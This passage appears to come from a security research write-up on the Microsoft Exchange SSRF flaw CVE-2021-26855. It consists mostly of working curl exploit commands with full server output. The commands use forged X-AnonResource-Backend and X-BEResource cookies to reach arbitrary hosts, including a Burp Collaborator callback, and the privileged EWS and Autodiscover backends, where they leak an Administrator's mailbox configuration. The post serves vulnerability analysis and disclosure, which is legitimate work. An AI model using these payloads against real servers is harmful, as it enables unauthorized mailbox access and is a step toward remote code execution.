x-feserver: WIN-T4RO9496TA7\n < x-aspnet-version: 4.0.30319\n < set-cookie: X-BackEndCookie=S-1-5-18=rJqNiZqNgai2sdKry62wxsvGyau+yNGYlp2MkJHRk5CcnpOBzsbLzc/JzM3MzYHNz83O0s/M0s7Pq8/OxczJxc7G; expires=Wed, 10-Mar-2021 01:36:19 GMT; path=/autodiscover; secure; HttpOnly\n < x-powered-by: ASP.NET\n < x-feserver: WIN-T4RO9496TA7\n < date: Wed, 10 Mar 2021 01:26:19 GMT\n < content-length: 3866\n <\n <?xml version=\"1.0\" encoding=\"utf-8\"?>\n <Autodiscover xmlns=\"http://schemas.microsoft.com/exchange/autodiscover/responseschema/2006\">\n <Response xmlns=\"http://schemas.microsoft.com/exchange/autodiscover/outlook/responseschema/2006a\">\n <User>\n <DisplayName>Administrator</DisplayName>\n <LegacyDN>/o=First Organization/ou=Exchange Administrative Group (FYDIBOHF23SPDLT)/cn=Recipients/cn=94812d66d68146e8b6ac7b3312a93d7b-Admin</LegacyDN>\n <AutoDiscoverSMTPAddress>Administrator@gibson.local</AutoDiscoverSMTPAddress>\n <DeploymentId>eb64d327-1a67-4c9c-b64d-38d567e95480</DeploymentId>\n </User>\n <Account>\n <AccountType>email</AccountType>\n <Action>settings</Action>\n <MicrosoftOnline>False</MicrosoftOnline>\n <Protocol>\n <Type>EXCH</Type>\n <Server>47f3c51d-2094-4651-b009-c4c4a86a75e4@gibson.local</Server>\n <ServerDN>/o=First Organization/ou=Exchange Administrative Group (FYDIBOHF23SPDLT)/cn=Configuration/cn=Servers/cn=47f3c51d-2094-4651-b009-c4c4a86a75e4@gibson.local</ServerDN>\n <ServerVersion>73C18880</ServerVersion>\n <MdbDN>/o=First Organization/ou=Exchange Administrative Group (FYDIBOHF23SPDLT)/cn=Configuration/cn=Servers/cn=47f3c51d-2094-4651-b009-c4c4a86a75e4@gibson.local/cn=Microsoft Private MDB</MdbDN>\n <PublicFolderServer>win-t4ro9496ta7.gibson.local</PublicFolderServer>\n <AD>WIN-T4RO9496TA7.gibson.local</AD>\n <ASUrl>https://win-t4ro9496ta7.gibson.local/EWS/Exchange.asmx</ASUrl>\n <EwsUrl>https://win-t4ro9496ta7.gibson.local/EWS/Exchange.asmx</EwsUrl>\n <EmwsUrl>https://win-t4ro9496ta7.gibson.local/EWS/Exchange.asmx</EmwsUrl>\n <EcpUrl>https://win-t4ro9496ta7.gibson.local/owa/</EcpUrl>\n <EcpUrl-um>?path=/options/callanswering</EcpUrl-um>\n <EcpUrl-aggr>?path=/options/connectedaccounts</EcpUrl-aggr>\n <EcpUrl-mt>options/ecp/PersonalSettings/DeliveryReport.aspx?rfr=olk&exsvurl=1&IsOWA=<IsOWA>&MsgID=<MsgID>&Mbx=<Mbx>&realm=gibson.local</EcpUrl-mt>\n <EcpUrl-ret>?path=/options/retentionpolicies</EcpUrl-ret>\n <EcpUrl-sms>?path=/options/textmessaging</EcpUrl-sms>\n <EcpUrl-photo>?path=/options/myaccount/action/photo</EcpUrl-photo>\n <EcpUrl-tm>options/ecp/?rfr=olk&ftr=TeamMailbox&exsvurl=1&realm=gibson.local</EcpUrl-tm>\n <EcpUrl-tmCreating>options/ecp/?rfr=olk&ftr=TeamMailboxCreating&SPUrl=<SPUrl>&Title=<Title>&SPTMAppUrl=<SPTMAppUrl>&exsvurl=1&realm=gibson.local</EcpUrl-tmCreating>\n <EcpUrl-tmEditing>options/ecp/?rfr=olk&ftr=TeamMailboxEditing&Id=<Id>&exsvurl=1&realm=gibson.local</EcpUrl-tmEditing>\n <EcpUrl-extinstall>?path=/options/manageapps</EcpUrl-extinstall>\n <OOFUrl>https://win-t4ro9496ta7.gibson.local/EWS/Exchange.asmx</OOFUrl>\n <UMUrl>https://win-t4ro9496ta7.gibson.local/EWS/UM2007Legacy.asmx</UMUrl>\n <ServerExclusiveConnect>off</ServerExclusiveConnect>\n </Protocol>\n <Protocol>\n <Type>EXPR</Type>\n <Server>win-t4ro9496ta7.gibson.local</Server>\n <SSL>Off</SSL>\n <AuthPackage>Ntlm</AuthPackage>\n <ServerExclusiveConnect>on</ServerExclusiveConnect>\n <CertPrincipalName>None</CertPrincipalName>\n <GroupingInformation>Default-First-Site-Name</GroupingInformation>\n </Protocol>\n <Protocol>\n <Type>WEB</Type>\n <Internal>\n <OWAUrl AuthenticationMethod=\"Basic, Fba\">https://win-t4ro9496ta7.gibson.local/owa/</OWAUrl>\n <Protocol>\n <Type>EXCH</Type>\n <ASUrl>https://win-t4ro9496ta7.gibson.local/EWS/Exchange.asmx</ASUrl>\n </Protocol>\n </Internal>\n </Protocol>\n </Account>\n </Response>\n * Connection #0 to host 192.168.123.207 left intact\n </Autodiscover>* Closing connection 0\n wvu@kharak:~/Downloads$\n \n\n**cdelafuente-r7** at March 24, 2021 2:49pm UTC reported:\n\n# CVE-2021-26855\n\n[CVE-2021-26855](<https://msrc.microsoft.com/update-guide/vulnerability/CVE-2021-26855>) is an SSRF vulnerability in Exchange that allows privileged access to Exchange\u2019s backend resources, ultimately leading to pre-auth RCE when [combined](<https://www.volexity.com/blog/2021/03/02/active-exploitation-of-microsoft-exchange-zero-day-vulnerabilities/>) with CVEs such as [CVE-2021-27065](<https://msrc.microsoft.com/update-guide/vulnerability/CVE-2021-27065>).\n\n## Microsoft\u2019s (Nmap) NSE script\n\nConveniently disclosed in Microsoft\u2019s [alternative mitigations](<https://msrc-blog.microsoft.com/2021/03/05/microsoft-exchange-server-vulnerabilities-mitigations-march-2021/>), [this script](<https://github.com/microsoft/CSS-Exchange/blob/main/Security/http-vuln-cve2021-26855.nse>) provides an easily reproducible PoC for CVE-2021-26855. My findings below are reflective of that.\n \n \n wvu@kharak:~/Downloads$ ls\n http-vuln-cve2021-26855.nse\n wvu@kharak:~/Downloads$ nmap -Pn -T4 -n -v -p 443 --open --script http-vuln-cve2021-26855 192.168.123.183\n Host discovery disabled (-Pn). All addresses will be marked 'up' and scan times will be slower.\n Starting Nmap 7.91 ( https://nmap.org ) at 2021-03-09 00:50 CST\n NSE: Loaded 1 scripts for scanning.\n NSE: Script Pre-scanning.\n Initiating NSE at 00:50\n Completed NSE at 00:50, 0.00s elapsed\n Initiating Connect Scan at 00:50\n Scanning 192.168.123.183 [1 port]\n Discovered open port 443/tcp on 192.168.123.183\n Completed Connect Scan at 00:50, 0.00s elapsed (1 total ports)\n NSE: Script scanning 192.168.123.183.\n Initiating NSE at 00:50\n Completed NSE at 00:50, 0.02s elapsed\n Nmap scan report for 192.168.123.183\n Host is up (0.00064s latency).\n \n PORT STATE SERVICE\n 443/tcp open https\n | http-vuln-cve2021-26855:\n | VULNERABLE:\n | Exchange Server SSRF Vulnerability\n | State: VULNERABLE\n | IDs: CVE:CVE-2021-26855\n | Exchange 2013 Versions < 15.00.1497.012, Exchange 2016 CU18 < 15.01.2106.013, Exchange 2016 CU19 < 15.01.2176.009, Exchange 2019 CU7 < 15.02.0721.013, Exchange 2019 CU8 < 15.02.0792.010 are vulnerable to a SSRF via the X-AnonResource-Backend and X-BEResource cookies.\n |\n | Disclosure date: 2021-03-02\n | References:\n | https://vulners.com/cve/CVE-2021-26855\n |_ http://aka.ms/exchangevulns\n \n NSE: Script Post-scanning.\n Initiating NSE at 00:50\n Completed NSE at 00:50, 0.00s elapsed\n Read data files from: /usr/local/bin/../share/nmap\n Nmap done: 1 IP address (1 host up) scanned in 0.26 seconds\n wvu@kharak:~/Downloads$\n \n\n### Ported to [curl(1)](<https://curl.se/>)\u2026\n \n \n wvu@kharak:~$ curl -kvb \"X-AnonResource=true; X-AnonResource-Backend=localhost/ecp/default.flt?~3; X-BEResource=localhost/owa/auth/logon.aspx?~3;\" https://192.168.123.183/owa/auth/x.js\n * Trying 192.168.123.183...\n * TCP_NODELAY set\n * Connected to 192.168.123.183 (192.168.123.183) port 443 (#0)\n * ALPN, offering h2\n * ALPN, offering http/1.1\n * successfully set certificate verify locations:\n * CAfile: /etc/ssl/cert.pem\n CApath: none\n * TLSv1.2 (OUT), TLS handshake, Client hello (1):\n * TLSv1.2 (IN), TLS handshake, Server hello (2):\n * TLSv1.2 (IN), TLS handshake, Certificate (11):\n * TLSv1.2 (IN), TLS handshake, Server key exchange (12):\n * TLSv1.2 (IN), TLS handshake, Server finished (14):\n * TLSv1.2 (OUT), TLS handshake, Client key exchange (16):\n * TLSv1.2 (OUT), TLS change cipher, Change cipher spec (1):\n * TLSv1.2 (OUT), TLS handshake, Finished (20):\n * TLSv1.2 (IN), TLS change cipher, Change cipher spec (1):\n * TLSv1.2 (IN), TLS handshake, Finished (20):\n * SSL connection using TLSv1.2 / ECDHE-RSA-AES128-GCM-SHA256\n * ALPN, server accepted to use h2\n * Server certificate:\n * subject: CN=WIN-T4RO9496TA7\n * start date: Mar 8 22:45:17 2021 GMT\n * expire date: Mar 8 22:45:17 2026 GMT\n * issuer: CN=WIN-T4RO9496TA7\n * SSL certificate verify result: unable to get local issuer certificate (20), continuing anyway.\n * Using HTTP2, server supports multi-use\n * Connection state changed (HTTP/2 confirmed)\n * Copying HTTP/2 data in stream buffer to connection buffer after upgrade: len=0\n * Using Stream ID: 1 (easy handle 0x7f8cb580b400)\n > GET /owa/auth/x.js HTTP/2\n > Host: 192.168.123.183\n > User-Agent: curl/7.64.1\n > Accept: */*\n > Cookie: X-AnonResource=true; X-AnonResource-Backend=localhost/ecp/default.flt?~3; X-BEResource=localhost/owa/auth/logon.aspx?~3;\n >\n * Connection state changed (MAX_CONCURRENT_STREAMS == 100)!\n < HTTP/2 500\n < cache-control: private\n < content-type: text/html; charset=utf-8\n < server: Microsoft-IIS/10.0\n < request-id: 864475e3-ee01-48a5-acf3-1b1cbbc50c02\n < x-calculatedbetarget: localhost\n < x-calculatedbetarget: localhost\n < x-feserver: WIN-T4RO9496TA7\n < x-aspnet-version: 4.0.30319\n < x-powered-by: ASP.NET\n < date: Tue, 09 Mar 2021 06:52:07 GMT\n < content-length: 85\n <\n * Connection #0 to host 192.168.123.183 left intact\n NegotiateSecurityContext failed with for host 'localhost' with status 'TargetUnknown'* Closing connection 0\n wvu@kharak:~$\n \n\n## SSRF to an arbitrary remote host\n\nYou can specify an arbitrary host in `X-AnonResource-Backend`.\n \n \n wvu@kharak:~$ curl -kvb \"X-AnonResource=true; X-AnonResource-Backend=192.168.123.1~$RANDOM\" \"https://192.168.123.183/owa/auth/$RANDOM.js\"\n * Trying 192.168.123.183...\n * TCP_NODELAY set\n * Connected to 192.168.123.183 (192.168.123.183) port 443 (#0)\n * ALPN, offering h2\n * ALPN, offering http/1.1\n * successfully set certificate verify locations:\n * CAfile: /etc/ssl/cert.pem\n CApath: none\n * TLSv1.2 (OUT), TLS handshake, Client hello (1):\n * TLSv1.2 (IN), TLS handshake, Server hello (2):\n * TLSv1.2 (IN), TLS handshake, Certificate (11):\n * TLSv1.2 (IN), TLS handshake, Server key exchange (12):\n * TLSv1.2 (IN), TLS handshake, Server finished (14):\n * TLSv1.2 (OUT), TLS handshake, Client key exchange (16):\n * TLSv1.2 (OUT), TLS change cipher, Change cipher spec (1):\n * TLSv1.2 (OUT), TLS handshake, Finished (20):\n * TLSv1.2 (IN), TLS change cipher, Change cipher spec (1):\n * TLSv1.2 (IN), TLS handshake, Finished (20):\n * SSL connection using TLSv1.2 / ECDHE-RSA-AES128-GCM-SHA256\n * ALPN, server accepted to use h2\n * Server certificate:\n * subject: CN=WIN-T4RO9496TA7\n * start date: Mar 8 22:45:17 2021 GMT\n * expire date: Mar 8 22:45:17 2026 GMT\n * issuer: CN=WIN-T4RO9496TA7\n * SSL certificate verify result: unable to get local issuer certificate (20), continuing anyway.\n * Using HTTP2, server supports multi-use\n * Connection state changed (HTTP/2 confirmed)\n * Copying HTTP/2 data in stream buffer to connection buffer after upgrade: len=0\n * Using Stream ID: 1 (easy handle 0x7f9ea080d600)\n > GET /owa/auth/22702.js HTTP/2\n > Host: 192.168.123.183\n > User-Agent: curl/7.64.1\n > Accept: */*\n > Cookie: X-AnonResource=true; X-AnonResource-Backend=192.168.123.1~4563\n >\n * Connection state changed (MAX_CONCURRENT_STREAMS == 100)!\n \n\n### Catching the request in [ncat(1)](<https://nmap.org/ncat/>)\u2026\n \n \n wvu@kharak:~$ ncat -lkv --ssl 443\n Ncat: Version 7.91 ( https://nmap.org/ncat )\n Ncat: Generating a temporary 2048-bit RSA key. Use --ssl-key and --ssl-cert to use a permanent one.\n Ncat: SHA-1 fingerprint: F55B E690 D8F2 84F1 EC64 816A 5763 2F5B B56F 0D72\n Ncat: Listening on :::443\n Ncat: Listening on 0.0.0.0:443\n Ncat: Connection from 192.168.123.183.\n Ncat: Connection from 192.168.123.183:6303.\n GET /owa/auth/22702.js HTTP/1.1\n X-FE-ClientIP: 192.168.123.1\n X-Forwarded-For: 192.168.123.1\n X-Forwarded-Port: 55723\n X-MS-EdgeIP:\n X-ExCompId: ClientAccessFrontEnd\n Accept: */*\n User-Agent: curl/7.64.1\n X-OriginalRequestHost: 192.168.123.183\n X-OriginalRequestHostSchemePort: 443:https:192.168.123.183\n X-MSExchangeActivityCtx: V=1.0.0.0;Id=26678ebf-2d0f-42bd-bac3-2d27889baed8;C=;P=\n msExchProxyUri: https://192.168.123.183/owa/auth/22702.js\n X-IsFromCafe: 1\n X-SourceCafeServer: WIN-T4RO9496TA7.GIBSON.LOCAL\n X-CommonAccessToken: VgEAVAlBbm9ueW1vdXNDAEUAAAAA\n X-vDirObjectId: 621dccd3-6dff-49aa-87be-7911a110125e\n Host: 192.168.123.1\n Cookie: X-AnonResource=true; X-AnonResource-Backend=192.168.123.1~4563\n Connection: Keep-Alive\n \n\nThe fun folks working on the [Nuclei scanner](<https://github.com/projectdiscovery/nuclei>) noticed [burpcollaborator.net](<https://burpcollaborator.net/>) made a [good target](<https://github.com/projectdiscovery/nuclei-templates/pull/1032>) for their scanner.\n \n \n wvu@kharak:~$ curl -kvb \"X-AnonResource=true; X-AnonResource-Backend=burpcollaborator.net~$RANDOM\" \"https://192.168.123.183/owa/auth/$RANDOM.js\"\n * Trying 192.168.123.183...\n * TCP_NODELAY set\n * Connected to 192.168.123.183 (192.168.123.183) port 443 (#0)\n * ALPN, offering h2\n * ALPN, offering http/1.1\n * successfully set certificate verify locations:\n * CAfile: /etc/ssl/cert.pem\n CApath: none\n * TLSv1.2 (OUT), TLS handshake, Client hello (1):\n * TLSv1.2 (IN), TLS handshake, Server hello (2):\n * TLSv1.2 (IN), TLS handshake, Certificate (11):\n * TLSv1.2 (IN), TLS handshake, Server key exchange (12):\n * TLSv1.2 (IN), TLS handshake, Server finished (14):\n * TLSv1.2 (OUT), TLS handshake, Client key exchange (16):\n * TLSv1.2 (OUT), TLS change cipher, Change cipher spec (1):\n * TLSv1.2 (OUT), TLS handshake, Finished (20):\n * TLSv1.2 (IN), TLS change cipher, Change cipher spec (1):\n * TLSv1.2 (IN), TLS handshake, Finished (20):\n * SSL connection using TLSv1.2 / ECDHE-RSA-AES128-GCM-SHA256\n * ALPN, server accepted to use h2\n * Server certificate:\n * subject: CN=WIN-T4RO9496TA7\n * start date: Mar 8 22:45:17 2021 GMT\n * expire date: Mar 8 22:45:17 2026 GMT\n * issuer: CN=WIN-T4RO9496TA7\n * SSL certificate verify result: unable to get local issuer certificate (20), continuing anyway.\n * Using HTTP2, server supports multi-use\n * Connection state changed (HTTP/2 confirmed)\n * Copying HTTP/2 data in stream buffer to connection buffer after upgrade: len=0\n * Using Stream ID: 1 (easy handle 0x7fd58480f600)\n > GET /owa/auth/18409.js HTTP/2\n > Host: 192.168.123.183\n > User-Agent: curl/7.64.1\n > Accept: */*\n > Cookie: X-AnonResource=true; X-AnonResource-Backend=burpcollaborator.net~31368\n >\n * Connection state changed (MAX_CONCURRENT_STREAMS == 100)!\n < HTTP/2 200\n < cache-control: private\n < content-type: text/html\n < server: Microsoft-IIS/10.0\n < request-id: 31688df5-982d-4d18-86d1-ae0e99c00ce8\n < x-calculatedbetarget: burpcollaborator.net\n < x-collaborator-version: 4\n < x-aspnet-version: 4.0.30319\n < x-powered-by: ASP.NET\n < date: Tue, 09 Mar 2021 07:58:52 GMT\n < content-length: 1190\n <\n <!DOCTYPE html>\n <html>\n <head>\n <meta charset=\"UTF-8\">\n </head>\n <body>\n <h1>Burp Collaborator Server</h1>\n <p>Burp Collaborator is a service that is used by <a href=\"https://portswigger.net/burp/\">Burp Suite</a> when testing web applications for security\n vulnerabilities. Some of Burp Suite's tests may cause the application being\n tested to interact with the Burp Collaborator server, to enable Burp Suite\n to detect various security vulnerabilities.\n </p><p>The Burp Collaborator server does not itself initiate any interactions with\n any system, and only responds to interactions that it receives from other\n systems.\n </p><p>If you are a systems administrator and you are seeing interactions with the\n Burp Collaborator server in your logs, then it is likely that someone is\n testing your web application using Burp Suite. If you are trying to identify\n the person responsible for this testing, you should review your web server\n or applications logs for the time at which these interactions were initiated\n by your systems.\n </p><p>For further details about Burp Collaborator, please see the <a href=\"https://portswigger.net/burp/documentation/collaborator/\">full documentation</a>.</p></body>\n * Connection #0 to host 192.168.123.183 left intact\n </html>* Closing connection 0\n wvu@kharak:~$\n \n\n## SSRF to a privileged backend resource\n\nHostname `WIN-T4RO9496TA7` is from the `x-feserver` header.\n \n \n wvu@kharak:~$ curl -kvb \"X-BEResource=WIN-T4RO9496TA7/EWS/Exchange.asmx?~$RANDOM\" \"https://192.168.123.183/ecp/$RANDOM.js\"\n * Trying 192.168.123.183...\n * TCP_NODELAY set\n * Connected to 192.168.123.183 (192.168.123.183) port 443 (#0)\n * ALPN, offering h2\n * ALPN, offering http/1.1\n * successfully set certificate verify locations:\n * CAfile: /etc/ssl/cert.pem\n CApath: none\n * TLSv1.2 (OUT), TLS handshake, Client hello (1):\n * TLSv1.2 (IN), TLS handshake, Server hello (2):\n * TLSv1.2 (IN), TLS handshake, Certificate (11):\n * TLSv1.2 (IN), TLS handshake, Server key exchange (12):\n * TLSv1.2 (IN), TLS handshake, Server finished (14):\n * TLSv1.2 (OUT), TLS handshake, Client key exchange (16):\n * TLSv1.2 (OUT), TLS change cipher, Change cipher spec (1):\n * TLSv1.2 (OUT), TLS handshake, Finished (20):\n * TLSv1.2 (IN), TLS change cipher, Change cipher spec (1):\n * TLSv1.2 (IN), TLS handshake, Finished (20):\n * SSL connection using TLSv1.2 / ECDHE-RSA-AES128-GCM-SHA256\n * ALPN, server accepted to use h2\n * Server certificate:\n * subject: CN=WIN-T4RO9496TA7\n * start date: Mar 8 22:45:17 2021 GMT\n * expire date: Mar 8 22:45:17 2026 GMT\n * issuer: CN=WIN-T4RO9496TA7\n * SSL certificate verify result: unable to get local issuer certificate (20), continuing anyway.\n * Using HTTP2, server supports multi-use\n * Connection state changed (HTTP/2 confirmed)\n * Copying HTTP/2 data in stream buffer to connection buffer after upgrade: len=0\n * Using Stream ID: 1 (easy handle 0x7faac2808200)\n > GET /ecp/1849.js HTTP/2\n > Host: 192.168.123.183\n > User-Agent: curl/7.64.1\n > Accept: */*\n > Cookie: X-BEResource=WIN-T4RO9496TA7/EWS/Exchange.asmx?~22406\n >\n * Connection state changed (MAX_CONCURRENT_STREAMS == 100)!\n < HTTP/2 200\n < cache-control: private\n < content-type: text/html; charset=UTF-8\n < server: Microsoft-IIS/10.0\n < request-id: b4762a11-d418-43f8-a435-f04420289a4c\n < x-calculatedbetarget: win-t4ro9496ta7\n < x-calculatedbetarget: win-t4ro9496ta7.gibson.local\n < x-diaginfo: WIN-T4RO9496TA7\n < x-beserver: WIN-T4RO9496TA7\n < x-feserver: WIN-T4RO9496TA7\n < x-aspnet-version: 4.0.30319\n < set-cookie: exchangecookie=ef4d50599057429b849b92e9059455af; expires=Wed, 09-Mar-2022 07:00:11 GMT; path=/; HttpOnly\n < set-cookie: X-BackEndCookie=S-1-5-18=rJqNiZqNgai2sdKry62wxsvGyau+yNGYlp2MkJHRk5CcnpOBzsbLzc/JzM3MzYHNz83O0s/M0s/Gq8/Ixc7Pxc7O; expires=Tue, 09-Mar-2021 07:10:11 GMT; path=/EWS; secure; HttpOnly\n < x-powered-by: ASP.NET\n < x-feserver: WIN-T4RO9496TA7\n < date: Tue, 09 Mar 2021 07:00:11 GMT\n < content-length: 2836\n <\n <HTML lang=\"en\"><HEAD><link rel=\"alternate\" type=\"text/xml\" href=\"https://win-t4ro9496ta7.gibson.local:444/EWS/Exchange.asmx?disco\"/><STYLE type=\"text/css\">#content{ FONT-SIZE: 0.7em; PADDING-BOTTOM: 2em; MARGIN-LEFT: 30px}BODY{MARGIN-TOP: 0px; MARGIN-LEFT: 0px; COLOR: #000000; FONT-FAMILY: Verdana; BACKGROUND-COLOR: white}P{MARGIN-TOP: 0px; MARGIN-BOTTOM: 12px; COLOR: #000000; FONT-FAMILY: Verdana}PRE{BORDER-RIGHT: #f0f0e0 1px solid; PADDING-RIGHT: 5px; BORDER-TOP: #f0f0e0 1px solid; MARGIN-TOP: -5px; PADDING-LEFT: 5px; FONT-SIZE: 1.2em; PADDING-BOTTOM: 5px; BORDER-LEFT: #f0f0e0 1px solid; PADDING-TOP: 5px; BORDER-BOTTOM: #f0f0e0 1px solid; FONT-FAMILY: Courier New; BACKGROUND-COLOR: #e5e5cc}.heading1{MARGIN-TOP: 0px; PADDING-LEFT: 15px; FONT-WEIGHT: normal; FONT-SIZE: 26px; MARGIN-BOTTOM: 0px; PADDING-BOTTOM: 3px; MARGIN-LEFT: -30px; WIDTH: 100%; COLOR: #ffffff; PADDING-TOP: 10px; FONT-FAMILY: Tahoma; BACKGROUND-COLOR: #003366}.intro{display: block; font-size: 1em;}</STYLE><TITLE>Service</TITLE></HEAD><BODY><DIV id=\"content\" role=\"main\"><h1 class=\"heading1\">Service</h1><BR/><P class=\"intro\">You have created a service.<P class='intro'>To test this service, you will need to create a client and use it to call the service. You can do this using the svcutil.exe tool from the command line with the following syntax:</P> <BR/><PRE>svcutil.exe <A HREF=\"https://win-t4ro9496ta7.gibson.local:444/EWS/Services.wsdl\">https://win-t4ro9496ta7.gibson.local:444/EWS/Services.wsdl</A></PRE></P><P class=\"intro\">This will generate a configuration file and a code file that contains the client class. Add the two files to your client application and use the generated client class to call the Service. For example:<BR/></P><h2 class='intro'>C#</h2><br /><PRE><font color=\"blue\">class </font><font color=\"black\">Test\n </font>{\n <font color=\"blue\"> static void </font>Main()\n {\n <font color=\"black\">HelloClient</font> client = <font color=\"blue\">new </font><font color=\"black\">HelloClient</font>();\n \n <font color=\"darkgreen\"> // Use the 'client' variable to call operations on the service.\n \n </font><font color=\"darkgreen\"> // Always close the client.\n </font> client.Close();\n }\n }\n </PRE><BR/><h2 class='intro'>Visual Basic</h2><br /><PRE><font color=\"blue\">Class </font><font color=\"black\">Test\n </font><font color=\"blue\"> Shared Sub </font>Main()\n <font color=\"blue\"> Dim </font>client As <font color=\"black\">HelloClient</font> = <font color=\"blue\">New </font><font color=\"black\">HelloClient</font>()\n <font color=\"darkgreen\"> ' Use the 'client' variable to call operations on the service.\n \n </font><font color=\"darkgreen\"> ' Always close the client.\n </font> client.Close()\n <font color=\"blue\"> End Sub\n * Connection #0 to host 192.168.123.183 left intact\n </font><font color=\"blue\">End Class</font></PRE></DIV></BODY></HTML>* Closing connection 0\n wvu@kharak:~$\n \n\n`POST`ing to the [EWS](<https://docs.microsoft.com/en-us/exchange/client-developer/web-service-reference/ews-reference-for-exchange>) endpoint (not shown) allows an attacker access to a target\u2019s mailbox. A sample [Autodiscover request](<https://docs.microsoft.com/en-us/exchange/client-developer/web-service-reference/pox-autodiscover-request-for-exchange>) is shown below.\n \n \n wvu@kharak:~/Downloads$ cat poc.xml\n <?xml version=\"1.0\"?>\n <Autodiscover xmlns=\"http://schemas.microsoft.com/exchange/autodiscover/outlook/requestschema/2006\">\n <Request>\n <EMailAddress>Administrator@gibson.local</EMailAddress>\n <AcceptableResponseSchema>http://schemas.microsoft.com/exchange/autodiscover/outlook/responseschema/2006a</AcceptableResponseSchema>\n </Request>\n </Autodiscover>\n wvu@kharak:~/Downloads$ curl -kvb \"X-BEResource=WIN-T4RO9496TA7/autodiscover/autodiscover.xml?~$RANDOM\" -H \"Content-Type: text/xml\" \"https://192.168.123.207/ecp/$RANDOM.js\" -d @poc.xml\n * Trying 192.168.123.207...\n * TCP_NODELAY set\n * Connected to 192.168.123.207 (192.168.123.207) port 443 (#0)\n * ALPN, offering h2\n * ALPN, offering http/1.1\n * successfully set certificate verify locations:\n * CAfile: /etc/ssl/cert.pem\n CApath: none\n * TLSv1.2 (OUT), TLS handshake, Client hello (1):\n * TLSv1.2 (IN), TLS handshake, Server hello (2):\n * TLSv1.2 (IN), TLS handshake, Certificate (11):\n * TLSv1.2 (IN), TLS handshake, Server key exchange (12):\n * TLSv1.2 (IN), TLS handshake, Server finished (14):\n * TLSv1.2 (OUT), TLS handshake, Client key exchange (16):\n * TLSv1.2 (OUT), TLS change cipher, Change cipher spec (1):\n * TLSv1.2 (OUT), TLS handshake, Finished (20):\n * TLSv1.2 (IN), TLS change cipher, Change cipher spec (1):\n * TLSv1.2 (IN), TLS handshake, Finished (20):\n * SSL connection using TLSv1.2 / ECDHE-RSA-AES128-GCM-SHA256\n * ALPN, server accepted to use h2\n * Server certificate:\n * subject: CN=WIN-T4RO9496TA7\n * start date: Mar 8 22:45:17 2021 GMT\n * expire date: Mar 8 22:45:17 2026 GMT\n * issuer: CN=WIN-T4RO9496TA7\n * SSL certificate verify result: unable to get local issuer certificate (20), continuing anyway.\n * Using HTTP2, server supports multi-use\n * Connection state changed (HTTP/2 confirmed)\n * Copying HTTP/2 data in stream buffer to connection buffer after upgrade: len=0\n * Using Stream ID: 1 (easy handle 0x7fa592808200)\n > POST /ecp/3425.js HTTP/2\n > Host: 192.168.123.207\n > User-Agent: curl/7.64.1\n > Accept: */*\n > Cookie: X-BEResource=WIN-T4RO9496TA7/autodiscover/autodiscover.xml?~24753\n > Content-Type: text/xml\n > Content-Length: 354\n >\n * Connection state changed (MAX_CONCURRENT_STREAMS == 100)!\n * We are completely uploaded and fine\n < HTTP/2 200\n < cache-control: private\n < content-type: text/xml; charset=utf-8\n < server: Microsoft-IIS/10.0\n < request-id: bde5e90a-fe14-4b47-aaca-1a713d9832b1\n < x-calculatedbetarget: win-t4ro9496ta7\n < x-calculatedbetarget: win-t4ro9496ta7.gibson.local\n < x-diaginfo: WIN-T4RO9496TA7\n < x-beserver: WIN-T4RO9496TA7\n < x-feserver: WIN-T4RO9496TA7\n < x-aspnet-version: 4.0.30319\n < set-cookie: X-BackEndCookie=S-1-5-18=rJqNiZqNgai2sdKry62wxsvGyau+yNGYlp2MkJHRk5CcnpOBzsbLzc/JzM3MzYHNz83O0s/M0s7Pq8/OxczJxc7G; expires=Wed, 10-Mar-2021 01:36:19 GMT; path=/autodiscover; secure; HttpOnly\n < x-powered-by: ASP.NET\n < x-feserver: WIN-T4RO9496TA7\n < date: Wed, 10 Mar 2021 01:26:19 GMT\n < content-length: 3866\n <\n <?xml version=\"1.0\" encoding=\"utf-8\"?>\n <Autodiscover xmlns=\"http://schemas.microsoft.com/exchange/autodiscover/responseschema/2006\">\n <Response xmlns=\"http://schemas.microsoft.com/exchange/autodiscover/outlook/responseschema/2006a\">\n <User>\n <DisplayName>Administrator</DisplayName>\n <LegacyDN>/o=First Organization/ou=Exchange Administrative Group (FYDIBOHF23SPDLT)/cn=Recipients/cn=94812d66d68146e8b6ac7b3312a93d7b-Admin</LegacyDN>\n <AutoDiscoverSMTPAddress>Administrator@gibson.local</AutoDiscoverSMTPAddress>\n <DeploymentId>eb64d327-1a67-4c9c-b64d-38d567e95480</DeploymentId>\n </User>\n <Account>\n <AccountType>email</AccountType>\n <Action>settings</Action>\n <MicrosoftOnline>False</MicrosoftOnline>\n <Protocol>\n <Type>EXCH</Type>\n <Server>47f3c51d-2094-4651-b009-c4c4a86a75e4@gibson.local</Server>\n <ServerDN>/o=First Organization/ou=Exchange Administrative Group (FYDIBOHF23SPDLT)/cn=Configuration/cn=Servers/cn=47f3c51d-2094-4651-b009-c4c4a86a75e4@gibson.local</ServerDN>\n <ServerVersion>73C18880</ServerVersion>\n <MdbDN>/o=First Organization/ou=Exchange Administrative Group (FYDIBOHF23SPDLT)/cn=Configuration/cn=Servers/cn=47f3c51d-2094-4651-b009-c4c4a86a75e4@gibson.local/cn=Microsoft Private MDB</MdbDN>\n <PublicFolderServer>win-t4ro9496ta7.gibson.local</PublicFolderServer>\n <AD>WIN-T4RO9496TA7.gibson.local</AD>\n <ASUrl>https://win-t4ro9496ta7.gibson.local/EWS/Exchange.asmx</ASUrl>\n <EwsUrl>https://win-t4ro9496ta7.gibson.local/EWS/Exchange.asmx</EwsUrl>\n <EmwsUrl>https://win-t4ro9496ta7.gibson.local/EWS/Exchange.asmx</EmwsUrl>\n <EcpUrl>https://win-t4ro9496ta7.gibson.local/owa/</EcpUrl>\n <EcpUrl-um>?path=/options/callanswering</EcpUrl-um>\n <EcpUrl-aggr>?path=/options/connectedaccounts</EcpUrl-aggr>\n <EcpUrl-mt>options/ecp/PersonalSettings/DeliveryReport.aspx?rfr=olk&exsvurl=1&IsOWA=<IsOWA>&MsgID=<MsgID>&Mbx=<Mbx>&realm=gibson.local</EcpUrl-mt>\n <EcpUrl-ret>?path=/options/retentionpolicies</EcpUrl-ret>\n <EcpUrl-sms>?path=/options/textmessaging</EcpUrl-sms>\n <EcpUrl-photo>?path=/options/myaccount/action/photo</EcpUrl-photo>\n <EcpUrl-tm>options/ecp/?rfr=olk&ftr=TeamMailbox&exsvurl=1&realm=gibson.local</EcpUrl-tm>\n 